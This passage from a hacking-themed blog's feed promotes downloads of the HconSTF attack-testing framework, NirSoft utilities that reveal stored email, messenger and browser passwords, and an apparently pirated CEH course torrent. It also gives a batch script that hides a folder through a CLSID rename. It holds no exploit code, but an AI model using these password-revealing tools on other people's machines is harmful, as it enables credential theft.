&lt;li&gt;&lt;span style="background-color: white;"&gt;&amp;nbsp; Easy to use &amp;amp; collaborative Operating System like interface&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="background-color: white;"&gt;&amp;nbsp; Multi-Language support (feature in heavy development translators needed)&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #990000;"&gt;You can download HconSTF 0.4 beta here:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #990000;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #990000;"&gt;&lt;a href="http://downloads.sourceforge.net/project/hconframework/HconFramework-Fire/HconSTF_0.4_Freedom/HconSTF_v0.4_Freedom_portable.exe?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fhconframework%2F&amp;amp;ts=1342547723&amp;amp;use_mirror=jaist" target="_blank"&gt;HconSTF_v0.4_Freedom_portable.exe&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfhNV_OlUvbp-AJU162ujTSqjMUWRcqwsgEbXhG2_N6umV6RICcLYw0Azws2i5H-_r2g4r9a6dT6xg-VF9xMb3f3B2PJ4VRX6ppw6iI_lOyITN8DYGb-AGhOjYy2OVXSqpPc4E9nWOSqD_/s72-c/HconSTF_main.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><enclosure length="57910571" type="application/octet-stream" url="http://downloads.sourceforge.net/project/hconframework/HconFramework-Fire/HconSTF_0.4_Freedom/HconSTF_v0.4_Freedom_portable.exe?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fhconframework%2F&amp;amp;ts=1342547723&amp;amp;use_mirror=jaist"/><itunes:explicit/><itunes:subtitle>HconSTF is an Open Source Penetration Testing Framework based on different browser technologies, Which helps any security professional to assists in the Penetration testing or vulnerability scanning assessment. It contains webtools which are capable of carrying out XSS attacks, SQL Injection, siXSS, CSRF, Trace XSS, RFI, LFI, etc. It could prove useful to anybody interested in the information security domain – students, security professionals, web developers and so on... Features : &amp;nbsp; Categorized and comprehensive toolset &amp;nbsp;Contains hundreds of tools and features and script for different tasks like SQLi, XSS, Dorks, OSINT to name a few &amp;nbsp; HconSTF webUI with online tools (same as the Aqua base version of HconSTF) &amp;nbsp; Each and every option is configured for penetration testing and Vulnerability assessments &amp;nbsp; Specially configured and enhanced for gaining easy &amp;amp; solid anonymity &amp;nbsp; Works for web app testing assessments specially for OWASP top 10 &amp;nbsp; Easy to use &amp;amp; collaborative Operating System like interface &amp;nbsp; Multi-Language support (feature in heavy development translators needed) You can download HconSTF 0.4 beta here: HconSTF_v0.4_Freedom_portable.exe</itunes:subtitle><itunes:author>noreply@blogger.com (Anonymous)</itunes:author><itunes:summary>HconSTF is an Open Source Penetration Testing Framework based on different browser technologies, Which helps any security professional to assists in the Penetration testing or vulnerability scanning assessment. It contains webtools which are capable of carrying out XSS attacks, SQL Injection, siXSS, CSRF, Trace XSS, RFI, LFI, etc. It could prove useful to anybody interested in the information security domain – students, security professionals, web developers and so on... Features : &amp;nbsp; Categorized and comprehensive toolset &amp;nbsp;Contains hundreds of tools and features and script for different tasks like SQLi, XSS, Dorks, OSINT to name a few &amp;nbsp; HconSTF webUI with online tools (same as the Aqua base version of HconSTF) &amp;nbsp; Each and every option is configured for penetration testing and Vulnerability assessments &amp;nbsp; Specially configured and enhanced for gaining easy &amp;amp; solid anonymity &amp;nbsp; Works for web app testing assessments specially for OWASP top 10 &amp;nbsp; Easy to use &amp;amp; collaborative Operating System like interface &amp;nbsp; Multi-Language support (feature in heavy development translators needed) You can download HconSTF 0.4 beta here: HconSTF_v0.4_Freedom_portable.exe</itunes:summary><itunes:keywords>coding, Dictionary, education, Ethical hacker/hacking, Exploits and Incident Handling, find the vulnerability, HACKING WINDOWS, HconSTF, password breakers/crackers, Session hijacking, Windows</itunes:keywords></item><item><title>CEH – Certified Ethical Hacker v7 Certification Training</title><link>http://hackrich.blogspot.com/2012/02/ceh-certified-ethical-hacker-v7.html</link><category>e</category><category>Ebook</category><category>education</category><category>Ethical hacker/hacking</category><category>Exploits and Incident Handling</category><category>Google Hacks</category><category>HACKING WINDOWS</category><category>php hack</category><category>SOCIAL ENGINEERING TOOLKIT</category><category>study</category><category>tools</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 4 Feb 2012 03:59:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-6344349274232565474</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhelPDuM7fYq9RoUxbQ157ycj4hyKNJ3fyDWtxT68jcbjBZsZaZ4u2TxVsjqbTLnkvwvcmCTxYypXEYFjbgOx-Wno7vPqnDxdq1-YnGSAwzOHtgqw1nyD8v1TtDMFJnGiZrQ8aCqZ8qQGK3/s1600/ethical.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhelPDuM7fYq9RoUxbQ157ycj4hyKNJ3fyDWtxT68jcbjBZsZaZ4u2TxVsjqbTLnkvwvcmCTxYypXEYFjbgOx-Wno7vPqnDxdq1-YnGSAwzOHtgqw1nyD8v1TtDMFJnGiZrQ8aCqZ8qQGK3/s400/ethical.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #38761d; font-size: large;"&gt;T&lt;/span&gt;&lt;span style="color: #38761d;"&gt;his CEH Certification will fortify the application knowledge of security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure. CEH candidates will be immersed into an interactive network hacking environment where they will be shown how to scan, test, hack and secure their own systems. Candidates will begin by understanding how perimeter defenses work and then be lead into scanning and attacking their own networks. No real network is harmed. CEH candidates then learn how intruders escalate privileges and what steps can be taken to secure a system. Candidates will also learn about Intrusion Detection, Policy Creation, Social Engineering, DDoS Attacks, Buffer Overflows and Virus Creation. Learn the art of penetration testing (pen testing) in order to create network intrusion vulnerability prevention plans.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b style="color: #6aa84f;"&gt;Topics Covered in Our Ethical Hacking Training&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style="color: #38761d; text-align: left;"&gt;&lt;li&gt;Developing the hacker’s mind&lt;/li&gt;
&lt;li&gt;Network surveying&lt;/li&gt;
&lt;li&gt;Port scanning&lt;/li&gt;
&lt;li&gt;System identification/OS fingerprinting&lt;/li&gt;
&lt;li&gt;Vulnerability research and verification&lt;/li&gt;
&lt;li&gt;Service identification&lt;/li&gt;
&lt;li&gt;Internet application testing&lt;/li&gt;
&lt;li&gt;Document grinding&lt;/li&gt;
&lt;li&gt;Recognizing security issues within an organization&lt;/li&gt;
&lt;li&gt;Performing legal assessments on remote/foreign networks&lt;/li&gt;
&lt;li&gt;Examining an organization for weaknesses as through the eyes of an industrial spy or a competitor&lt;/li&gt;
&lt;li&gt;Implementing the right tools for each task of the Methodology&lt;/li&gt;
&lt;li&gt;Competitive Intelligence&lt;/li&gt;
&lt;li&gt;Exploiting vulnerabilities remotely&lt;/li&gt;
&lt;li&gt;Examining appropriate countermeasures to thwart malicious hacking&lt;/li&gt;
&lt;/ul&gt;&lt;div style="text-align: left;"&gt;&lt;span style="color: #6aa84f; font-size: large;"&gt;&lt;b&gt;CEH v7 Training Audience&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;The Certified Ethical Hacker certification will fortify the application knowledge of security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;Certified Ethical Hacker Bootcamp Pre-Requisite&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;A Certified Ethical Hacker bootcamp training class candidate should have at least two years of information technology experience, a strong working knowledge of TCP/IP, and a basic familiarity with Linux or strong working support knowledge of Microsoft XP or Vista.&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: left;"&gt;&amp;nbsp;&lt;span style="color: #674ea7; font-size: x-large;"&gt;►&lt;/span&gt;&lt;span style="color: #674ea7;"&gt; &lt;a href="http://dl.btjunkie.org/torrent/CEH-Training-CBT-Boot-Camp-Certified-Ethical-Hacker-CEH-v7/4239e19658fbf08e498873ec8213ddae805f9a5f8dea/download.torrent"&gt;&lt;b&gt;Download torrent &lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;span style="color: #674ea7; font-size: x-large;"&gt;◄&lt;/span&gt;&amp;nbsp; &lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;b style="color: #660000;"&gt;Dun forget to share this blog if u think we helped you and/or if u like this blog share it join our facebook page to get upadates..&lt;/b&gt; &lt;b style="color: #cc0000;"&gt;:)&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhelPDuM7fYq9RoUxbQ157ycj4hyKNJ3fyDWtxT68jcbjBZsZaZ4u2TxVsjqbTLnkvwvcmCTxYypXEYFjbgOx-Wno7vPqnDxdq1-YnGSAwzOHtgqw1nyD8v1TtDMFJnGiZrQ8aCqZ8qQGK3/s72-c/ethical.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">16</thr:total></item><item><title>Windows Password Recovery Tools 1</title><link>http://hackrich.blogspot.com/2012/01/windows-password-recovery-tools-1.html</link><category>mail</category><category>password breakers/crackers</category><category>Password Recovery</category><category>tools</category><category>Windows</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 17 Jan 2012 11:05:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-5489804851207230726</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;span style="color: #351c75; font-size: small;"&gt;&lt;i&gt;█► Password recovery tools for variety of "Windows" programs, including "Internet Explorer", "Outlook Express", "Microsoft Outlook", "Dialup entries of Windows", "Yahoo Messenger", "MSN Messenger", and more..... ◄█&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;i&gt;&amp;nbsp;█&lt;span style="font-size: large;"&gt; MessenPass &lt;span style="font-size: x-large;"&gt;█&lt;/span&gt; &lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;i style="color: #38761d;"&gt;*nirsoft*&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUWKjkEelvmnAQCe4_pc5CxQBD2snR92CDL1iJSKnww4efQpvlygg6gOAlQ1yaGyN1vdE_sHqR_vaGTB248PhKLGwskWx9C2wB2sVY8QplsUX20YG4ZyWYN-dvgaft7pDFZ8O2BxDpt4Xu/s1600/mspass.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUWKjkEelvmnAQCe4_pc5CxQBD2snR92CDL1iJSKnww4efQpvlygg6gOAlQ1yaGyN1vdE_sHqR_vaGTB248PhKLGwskWx9C2wB2sVY8QplsUX20YG4ZyWYN-dvgaft7pDFZ8O2BxDpt4Xu/s640/mspass.gif" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #674ea7; font-size: small;"&gt;&amp;nbsp;Recovers the passwords of most popular Instant Messenger programs in Windows: MSN Messenger, Windows Messenger, Windows Live Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM...&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;a href="http://www.blogger.com/post-edit.g?blogID=6164715670569201386&amp;amp;postID=5489804851207230726&amp;amp;from=pencil"&gt;&lt;span style="color: #674ea7; font-size: small;"&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #45818e; font-size: large;"&gt;&lt;a href="http://nirsoft.net/utils/mspass_setup.exe" target="_blank"&gt;&lt;b&gt;◄Download►&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #674ea7; font-size: small;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;&lt;b style="color: #351c75;"&gt;█ Mail PassView █&lt;/b&gt;&lt;/span&gt; &lt;i style="color: #38761d;"&gt;*nirsoft*&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPZ2unO8Ub3oIrHrFwWjJx55-2Z1BlKCgnrvvkMAVLjiNDhxuAMCLDvUs12OjgRPhGEay203MWMcEAkoFCjHpNTl9bvPUHI2SVx_AKLx8fZsqePPjbr2H_EzZOf_I5QZ-HdGwqZpnXXH6P/s1600/mailpv.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPZ2unO8Ub3oIrHrFwWjJx55-2Z1BlKCgnrvvkMAVLjiNDhxuAMCLDvUs12OjgRPhGEay203MWMcEAkoFCjHpNTl9bvPUHI2SVx_AKLx8fZsqePPjbr2H_EzZOf_I5QZ-HdGwqZpnXXH6P/s640/mailpv.gif" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;&lt;br /&gt;
&amp;nbsp;&lt;span style="color: #674ea7;"&gt;&lt;br /&gt;
&amp;nbsp; &lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #674ea7;"&gt;Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients: &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt; &lt;i&gt;╪ &lt;/i&gt;&lt;/b&gt;&lt;i&gt;"Outlook Express&lt;/i&gt;&lt;/span&gt;&lt;i&gt;"&lt;br style="color: #674ea7;" /&gt;&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;╪&amp;nbsp; &lt;/b&gt;"Microsoft Outlook 2000" (POP3 and SMTP Accounts only)&lt;/span&gt;&lt;br style="color: #674ea7;" /&gt;&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;╪ &lt;/b&gt;"Microsoft Outlook 2002/2003/2007/2010" (POP3, IMAP, HTTP and SMTP Accounts)&lt;/span&gt;&lt;br style="color: #674ea7;" /&gt;&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt; ╪&lt;/b&gt; "Windows Mail&lt;/span&gt;"&lt;br style="color: #674ea7;" /&gt;&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;╪&lt;/b&gt; "Windows Live Mail&lt;/span&gt;"&lt;br style="color: #674ea7;" /&gt;&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;╪&lt;/b&gt; "IncrediMail"&lt;/span&gt;&lt;br style="color: #674ea7;" /&gt;&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;╪&lt;/b&gt; "Eudora&lt;/span&gt;"&lt;br style="color: #674ea7;" /&gt;&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;╪&lt;/b&gt; "Netscape 6.x/7.x" (If the password is not encrypted with master password)&lt;/span&gt;&lt;br style="color: #674ea7;" /&gt;&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;╪&lt;/b&gt; "Mozilla Thunderbird" (If the password is not encrypted with master password)&lt;/span&gt;&lt;br style="color: #674ea7;" /&gt;&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;╪&lt;/b&gt; "Group Mail Free&lt;/span&gt;"&lt;br style="color: #674ea7;" /&gt;&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;╪&lt;/b&gt; "Yahoo! Mail" - If the password is saved in Yahoo! Messenger application.&lt;/span&gt;&lt;br style="color: #674ea7;" /&gt;&lt;span style="color: #674ea7;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;╪&lt;/b&gt; "Hotmail/MSN mail" - If the password is saved in MSN/Windows/Live Messenger application.&lt;/span&gt;&lt;/i&gt;&lt;span style="color: #674ea7;"&gt;&lt;i&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;╪&lt;/b&gt; "Gmail" - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.&lt;/i&gt;... &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://nirsoft.net/utils/mailpv_setup.exe" target="_blank"&gt;&lt;span style="font-size: large;"&gt;&lt;b style="color: #38761d;"&gt;►Download◄ &lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #351c75;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="color: #351c75; font-size: x-large;"&gt;►IE PassView◄&lt;/span&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&lt;/span&gt;&amp;nbsp;&amp;nbsp; &lt;i style="color: #38761d;"&gt;*nirsoft*&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXr5KBnMwNRa0JaW7U5WdwmeUqjND_vChyphenhyphenISrpj5RvffXXs6E-at7VwOGzxkU4-4SAWJFj9RNipNYS32HaGwYifkesR39rz8JVFi-mXUs1VJLxYAFsSzvy-_-q54XHGU-0QSrQGX-A-ZDD/s1600/iepv.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXr5KBnMwNRa0JaW7U5WdwmeUqjND_vChyphenhyphenISrpj5RvffXXs6E-at7VwOGzxkU4-4SAWJFj9RNipNYS32HaGwYifkesR39rz8JVFi-mXUs1VJLxYAFsSzvy-_-q54XHGU-0QSrQGX-A-ZDD/s640/iepv.gif" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;i style="color: #674ea7;"&gt;♫ IE PassView is a small password management utility that reveals the passwords stored by Internet Explorer Web browser, and allows you to delete passwords that you don't need anymore. It supports all versions of Internet Explorer, from version 4.0 and up to 9.0.&lt;br /&gt;
♫ For each password that is stored by Internet Explorer, the following information is displayed: Web address, Password Type (AutoComplete, Password-Protected Web Site, or FTP), Storage Location (Registry, Credentials File, or Protected Storage), and the user name/password pair. You can select one or more items from the passwords list and export them into text/html/csv/xml file.... &lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: #38761d;"&gt;&lt;a href="http://nirsoft.net/utils/iepv_setup.exe" target="_blank"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;►Download◄&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: #351c75;"&gt;&lt;b&gt;&lt;span style="font-size: x-large;"&gt;█ Protected Storage PassView █ &lt;/span&gt;&lt;/b&gt;&lt;i style="color: #38761d;"&gt;*nirsoft*&lt;/i&gt;&lt;/div&gt;&lt;b&gt;&lt;span style="font-size: x-large;"&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhcpfXL_ZcPimM55omUgoZgcGgNTkfTzwSfX6VBrr4JV9xFknYekIdwPlsF_bJbLBotPDwbHmruIH5aTx_9NzFxwmAkiIOJ_6Vv6G1SWQSFpxWeP2FXtb2rgu2Seg1JedcaeDqgfjBFpZ5/s1600/pspv.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhcpfXL_ZcPimM55omUgoZgcGgNTkfTzwSfX6VBrr4JV9xFknYekIdwPlsF_bJbLBotPDwbHmruIH5aTx_9NzFxwmAkiIOJ_6Vv6G1SWQSFpxWeP2FXtb2rgu2Seg1JedcaeDqgfjBFpZ5/s640/pspv.gif" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: x-large;"&gt;♫ &lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span style="color: #674ea7;"&gt;Recovers all passwords stored inside the Windows Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more... &lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.blogger.com/goog_2105619385"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://nirsoft.net/utils/pspv.zip" target="_blank"&gt;&lt;b style="color: #38761d;"&gt;&lt;span style="font-size: large;"&gt;◄ Download ►&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUWKjkEelvmnAQCe4_pc5CxQBD2snR92CDL1iJSKnww4efQpvlygg6gOAlQ1yaGyN1vdE_sHqR_vaGTB248PhKLGwskWx9C2wB2sVY8QplsUX20YG4ZyWYN-dvgaft7pDFZ8O2BxDpt4Xu/s72-c/mspass.gif" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Create locker using command prompt</title><link>http://hackrich.blogspot.com/2011/12/create-locker-using-command-prompt.html</link><category>Codes</category><category>coding</category><category>command prompt</category><category>education</category><category>Hacking Tutorials</category><category>study</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 13 Dec 2011 01:06:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-6494866968247679738</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;b style="color: #351c75;"&gt;There are number of ways to make locker but if you have just basic knowledge of CMD then u can make script to create, lock &amp;amp; unlock ur locker :)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF5MRXHXj7sHs8cpYcUMRwpbHpLDMuK8afPzLwlYM855XuE34LPEbxRmyJCCjIE7qvj9Wv6K9NQTPDjkVLUrjnwvsUSpQDvQCaf1Y94T7Awhb3hcHRfOfytX6-E429bBfegqWdaoF0Fh33/s1600/LOCKER.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF5MRXHXj7sHs8cpYcUMRwpbHpLDMuK8afPzLwlYM855XuE34LPEbxRmyJCCjIE7qvj9Wv6K9NQTPDjkVLUrjnwvsUSpQDvQCaf1Y94T7Awhb3hcHRfOfytX6-E429bBfegqWdaoF0Fh33/s400/LOCKER.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;span style="font-size: large;"&gt;&lt;b style="color: #351c75;"&gt;To create and unlock locker:&lt;/b&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: #990000;"&gt;CODE:&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: #38761d;"&gt;Color 0A&lt;br /&gt;
Title "Hackrich"&lt;br /&gt;
PAUSE&lt;br /&gt;
ATTRIB -R -S -H +A C:\SachSongsEnglishHolywoodwavesmp3.{EE4DA6A4-8C52-4a63-BBB8-97C93D7E1B6C}&lt;br /&gt;
RENAME C:\SachSongsEnglishHolywoodwavesmp3.{EE4DA6A4-8C52-4a63-BBB8-97C93D7E1B6C} LOCKER &lt;br /&gt;
MD C:\LOCKER&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #674ea7;"&gt;Save it as unlock.bat using notepad :) &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;i style="color: #351c75;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;To lock ur locker:&lt;/b&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: #990000;"&gt;CODE&lt;/b&gt;:&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;color 0A&lt;/span&gt;&lt;br style="color: #38761d;" /&gt;&lt;span style="color: #38761d;"&gt;TITLE "Hackrich"&lt;/span&gt;&lt;br style="color: #38761d;" /&gt;&lt;span style="color: #38761d;"&gt;PAUSE&lt;/span&gt;&lt;br style="color: #38761d;" /&gt;&lt;span style="color: #38761d;"&gt;ATTRIB -R -S -H +A C:\LOCKER&lt;/span&gt;&lt;br style="color: #38761d;" /&gt;&lt;span style="color: #38761d;"&gt;RENAME C:\LOCKER SachSongsEnglishHolywoodwavesmp3.{EE4DA6A4-8C52-4a63-BBB8-97C93D7E1B6C}&lt;/span&gt;&lt;br style="color: #38761d;" /&gt;&lt;span style="color: #38761d;"&gt;ATTRIB +R +S +H -A C:\SachSongsEnglishHolywoodwavesmp3.{EE4DA6A4-8C52-4a63-BBB8-97C93D7E1B6C}&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: #674ea7;"&gt;Save it as lock.bat using notepad &lt;span style="color: #cc0000;"&gt;:)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Well really we do not lock folder by this method but we redirect access &lt;span style="color: #cc0000;"&gt;:)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Now copy both lock.bat &amp;amp; unlock.bat and paste them into winDIR ("x:\windows”)&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Nothing hard here have fun !&lt;span style="color: #990000;"&gt; Share it&lt;/span&gt;&lt;span style="color: #cc0000;"&gt; :)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
